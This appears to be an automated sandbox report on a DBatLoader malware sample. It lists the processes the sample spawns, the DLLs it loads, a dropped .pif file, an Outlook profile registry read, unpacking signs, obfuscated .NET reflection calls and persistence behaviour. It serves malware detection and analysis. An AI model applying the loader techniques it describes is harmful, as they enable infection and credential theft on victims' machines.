Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd""	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd""	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Links\dajivhqI.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: y79a2l1FY5.exe

Static file information: File size 1948672 > 1048576

Source: y79a2l1FY5.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x15d800

Source:	Binary string: easinvoker.pdb source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000849000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000872000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Links\dajivhqI.pif

Unpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Links\dajivhqI.pif

Unpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.y79a2l1FY5.exe.23ce118.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.y79a2l1FY5.exe.29c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.y79a2l1FY5.exe.23ce118.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.883239659.00000000023CE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 7.2.dajivhqI.pif.2a0c0000.5.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 7.2.dajivhqI.pif.29f70a4e.4.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 7.2.dajivhqI.pif.2b325570.8.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: dajivhqI.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_029D3E20

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029E62A4 push 029E630Fh; ret	0_2_029E6307
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C3210 push eax; ret	0_2_029C324C
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029E60AC push 029E6125h; ret	0_2_029E611D
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029DA018 push ecx; mov dword ptr [esp], edx	0_2_029DA01D
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D606C push 029D60A4h; ret	0_2_029D609C
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029E61F8 push 029E6288h; ret	0_2_029E6280
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029E6144 push 029E61ECh; ret	0_2_029E61E4
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C617C push 029C61BEh; ret	0_2_029C61B6
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C617A push 029C61BEh; ret	0_2_029C61B6
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CF600 push 029CF64Dh; ret	0_2_029CF645
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CC498 push 029CC61Eh; ret	0_2_029CC616
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CC486 push 029CC61Eh; ret	0_2_029CC616
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CF4F4 push 029CF56Ah; ret	0_2_029CF562
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D2410 push ecx; mov dword ptr [esp], edx	0_2_029D2412
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CF5FF push 029CF64Dh; ret	0_2_029CF645
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029E5854 push 029E5A3Ah; ret	0_2_029E5A32
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D2EDC push 029D2F87h; ret	0_2_029D2F7F
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D2EDA push 029D2F87h; ret	0_2_029D2F7F
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CBE18 push ecx; mov dword ptr [esp], edx	0_2_029CBE1D
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3F84 push 029D3FBCh; ret	0_2_029D3FB4
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D9FB4 push ecx; mov dword ptr [esp], edx	0_2_029D9FB9
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C5D9E push 029C5DFBh; ret	0_2_029C5DF3
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029C5DA0 push 029C5DFBh; ret	0_2_029C5DF3
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029CCDE0 push 029CCE0Ch; ret	0_2_029CCE04
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: 0_2_029D3D40 push 029D3D82h; ret	0_2_029D3D7A
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00423149 push eax; ret	7_2_00423179
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0041C50E push cs; iretd	7_2_0041C4E2
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_004231C8 push eax; ret	7_2_00423179
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0040E21D push ecx; ret	7_2_0040E230
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0041C6BE push ebx; ret	7_2_0041C6BF

Source: 7.3.dajivhqI.pif.282772e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.dajivhqI.pif.2b326458.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.dajivhqI.pif.29f71936.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.dajivhqI.pif.2b34e390.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'adwZu8e65Q9J7', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

File created: C:\Users\user\Links\dajivhqI.pif

Jump to dropped file

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

File created: C:\Users\user\Links\dajivhqI.pif

Jump to dropped file

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029D64E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_029D64E4

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
